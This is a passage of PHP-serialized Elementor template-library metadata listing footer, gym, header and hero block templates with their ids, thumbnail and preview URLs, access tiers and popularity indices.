8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_hero_1.png\";s:12:\"tmpl_created\";i:1521547332;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:340;s:16:\"popularity_index\";i:100;s:11:\"trend_index\";i:83;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:594;a:19:{s:4:\"tmpl\";i:638;s:2:\"id\";i:7638;s:5:\"title\";s:8:\"Footer 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_hero_2.png\";s:12:\"tmpl_created\";i:1521547502;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:342;s:16:\"popularity_index\";i:124;s:11:\"trend_index\";i:147;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:595;a:19:{s:4:\"tmpl\";i:888;s:2:\"id\";i:11424;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/08/404_Small.png\";s:12:\"tmpl_created\";i:1567393309;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:13:\"[\"404\",\"Gym\"]\";s:10:\"menu_order\";i:344;s:16:\"popularity_index\";i:679;s:11:\"trend_index\";i:769;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:596;a:19:{s:4:\"tmpl\";i:887;s:2:\"id\";i:11435;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/08/Archiv_Small.png\";s:12:\"tmpl_created\";i:1567393296;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:346;s:16:\"popularity_index\";i:441;s:11:\"trend_index\";i:507;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:597;a:19:{s:4:\"tmpl\";i:886;s:2:\"id\";i:11445;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/08/Post_Small.png\";s:12:\"tmpl_created\";i:1567393229;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:349;s:16:\"popularity_index\";i:452;s:11:\"trend_index\";i:479;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:598;a:19:{s:4:\"tmpl\";i:885;s:2:\"id\";i:11453;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/08/Footer_Small.png\";s:12:\"tmpl_created\";i:1567393224;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:16:\"[\"Footer\",\"Gym\"]\";s:10:\"menu_order\";i:351;s:16:\"popularity_index\";i:270;s:11:\"trend_index\";i:331;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:599;a:19:{s:4:\"tmpl\";i:884;s:2:\"id\";i:11461;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-gym-and-fitness.png\";s:12:\"tmpl_created\";i:1567393219;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/gym/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:16:\"[\"Gym\",\"Header\"]\";s:10:\"menu_order\";i:352;s:16:\"popularity_index\";i:201;s:11:\"trend_index\";i:135;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:600;a:19:{s:4:\"tmpl\";i:635;s:2:\"id\";i:7596;s:5:\"title\";s:8:\"Header 1\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.12.jpg\";s:12:\"tmpl_created\";i:1521546999;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:10:\"[\"Header\"]\";s:10:\"menu_order\";i:354;s:16:\"popularity_index\";i:33;s:11:\"trend_index\";i:17;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:601;a:19:{s:4:\"tmpl\";i:663;s:2:\"id\";i:7801;s:5:\"title\";s:9:\"header 10\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.9.jpg\";s:12:\"tmpl_created\";i:1524583659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:356;s:16:\"popularity_index\";i:51;s:11:\"trend_index\";i:14;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:602;a:19:{s:4:\"tmpl\";i:658;s:2:\"id\";i:7812;s:5:\"title\";s:9:\"header 11\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.10.jpg\";s:12:\"tmpl_created\";i:1524583298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:358;s:16:\"popularity_index\";i:96;s:11:\"trend_index\";i:103;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:603;a:19:{s:4:\"tmpl\";i:657;s:2:\"id\";i:7825;s:5:\"title\";s:9:\"header 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.11.jpg\";s:12:\"tmpl_created\";i:1524583273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:360;s:16:\"popularity_index\";i:63;s:11:\"trend_index\";i:75;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:604;a:19:{s:4:\"tmpl\";i:694;s:2:\"id\";i:9127;s:5:\"title\";s:9:\"header 13\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2018/07/Header_get_started_1200V3.png\";s:12:\"tmpl_created\";i:1532428699;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:362;s:16:\"popularity_index\";i:61;s:11:\"trend_index\";i:58;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:605;a:19:{s:4:\"tmpl\";i:636;s:2:\"id\";i:7615;s:5:\"title\";s:8:\"Header 2\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.1.jpg\";s:12:\"tmpl_created\";i:1521547237;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:10:\"[\"Header\"]\";s:10:\"menu_order\";i:365;s:16:\"popularity_index\";i:30;s:11:\"trend_index\";i:33;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:606;a:19:{s:4:\"tmpl\";i:665;s:2:\"id\";i:7713;s:5:\"title\";s:8:\"header 3\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.2.jpg\";s:12:\"tmpl_created\";i:1524584780;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:367;s:16:\"popularity_index\";i:43;s:11:\"trend_index\";i:28;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:607;a:19:{s:4:\"tmpl\";i:659;s:2:\"id\";i:7724;s:5:\"title\";s:8:\"header 4\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.3.jpg\";s:12:\"tmpl_created\";i:1524583367;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:369;s:16:\"popularity_index\";i:24;s:11:\"trend_index\";i:13;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:608;a:19:{s:4:\"tmpl\";i:660;s:2:\"id\";i:7734;s:5:\"title\";s:8:\"header 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.4.jpg\";s:12:\"tmpl_created\";i:1524583436;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:371;s:16:\"popularity_index\";i:36;s:11:\"trend_index\";i:18;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:609;a:19:{s:4:\"tmpl\";i:666;s:2:\"id\";i:7744;s:5:\"title\";s:8:\"Header 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.5.jpg\";s:12:\"tmpl_created\";i:1524584784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:372;s:16:\"popularity_index\";i:65;s:11:\"trend_index\";i:94;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:610;a:19:{s:4:\"tmpl\";i:664;s:2:\"id\";i:7754;s:5:\"title\";s:8:\"header 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.6.jpg\";s:12:\"tmpl_created\";i:1524583712;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:375;s:16:\"popularity_index\";i:111;s:11:\"trend_index\";i:143;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:611;a:19:{s:4:\"tmpl\";i:661;s:2:\"id\";i:7771;s:5:\"title\";s:8:\"header 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.7.jpg\";s:12:\"tmpl_created\";i:1524583540;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:376;s:16:\"popularity_index\";i:91;s:11:\"trend_index\";i:60;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:612;a:19:{s:4:\"tmpl\";i:662;s:2:\"id\";i:7787;s:5:\"title\";s:8:\"header 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.8.jpg\";s:12:\"tmpl_created\";i:1524583598;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:379;s:16:\"popularity_index\";i:102;s:11:\"trend_index\";i:78;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:613;a:19:{s:4:\"tmpl\";i:572;s:2:\"id\";i:6266;s:5:\"title\";s:6:\"Hero 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_4.png\";s:12:\"tmpl_created\";i:1520443695;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:380;s:16:\"popularity_index\";i:52;s:11:\"trend_index\";i:35;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:614;a:19:{s:4:\"tmpl\";i:528;s:2:\"id\";i:5783;s:5:\"title\";s:7:\"Hero 10\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_2.png\";s:12:\"tmpl_created\";i:1520443586;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:383;s:16:\"popularity_index\";i:365;s:11:\"trend_index\";i:567;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:615;a:19:{s:4:\"tmpl\";i:527;s:2:\"id\";i:5773;s:5:\"title\";s:7:\"Hero 11\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_1.png\";s:12:\"tmpl_created\";i:1520443584;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:384;s:16:\"popularity_index\";i:39;s:11:\"trend_index\";i:179;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:616;a:19:{s:4:\"tmpl\";i:479;s:2:\"id\";i:5238;s:5:\"title\";s:7:\"Hero 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_4.png\";s:12:\"tmpl_created\";i:1520443468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:386;s:16:\"popularity_index\";i:611;s:11:\"trend_index\";i:555;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:617;a:19:{s:4:\"tmpl\";i:573;s:2:\"id\";i:6274;s:5:\"title\";s:6:\"Hero 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_5.png\";s:12:\"tmpl_created\";i:1520443698;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:389;s:16:\"popularity_index\";i:87;s:11:\"trend_index\";i:88;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:618;a:19:{s:4:\"tmpl\";i:569;s:2:\"id\";i:6239;s:5:\"title\";s:6:\"Hero 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_1.png\";s:12:\"tmpl_created\";i:1520443689;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:391;s:16:\"popularity_index\";i:23;s:11:\"trend_index\";i:34;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:619;a:19:{s:4:\"tmpl\";i:571;s:2:\"id\";i:6258;s:5:\"title\";s:6:\"Hero 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_3.png\";s:12:\"tmpl_created\";i:1520443693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:393;s:16:\"popularity_index\";i:479;s:11:\"trend_index\";i:470;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:620;a:19:{s:4:\"tmpl\";i:570;s:2:\"id\";i:6249;s:5:\"title\";s:6:\"Hero 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_2.png\";s:12:\"tmpl_created\";i:1520443691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:395;s:16:\"popularity_index\";i:56;s:11:\"trend_index\";i:85;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:621;a:19:{s:4:\"tmpl\";i:568;s:2:\"id\";i:6230;s:5:\"title\";s:6:\"Hero 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_white_1.png\";s:12:\"tmpl_created\";i:1520443687;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:396;s:16:\"popularity_index\";i:406;s:11:\"trend_index\";i:542;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:622;a:19:{s:4:\"tmpl\";i:530;s:2:\"id\";i:5801;s:5:\"title\";s:6:\"Hero 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_4.png\";s:12:\"tmpl_created\";i:1520443589;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:398;s:16:\"popularity_index\";i:15;s:11:\"trend_index\";i:37;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:623;a:19:{s:4:\"tmpl\";i:531;s:2:\"id\";i:5811;s:5:\"title\";s:6:\"Hero 8\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_5.png\";s:12:\"tmpl_created\";i:1520443591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:400;s:16:\"popularity_index\";i:105;s:11:\"trend_index\";i:86;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:624;a:19:{s:4:\"tmpl\";i:529;s:2:\"id\";i:5792;s:5:\"title\";s:6:\"Hero 9\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_3.png\";s:12:\"tmpl_created\";i:1520443588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:403;s:16:\"popularity_index\";i:225;s:11:\"trend_index\";i:244;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:625;a:19:{s:4:\"tmpl\";i:978;s:2:\"id\";i:13251;s:5:\"title\";s:27:\"Interior Design &#8211; 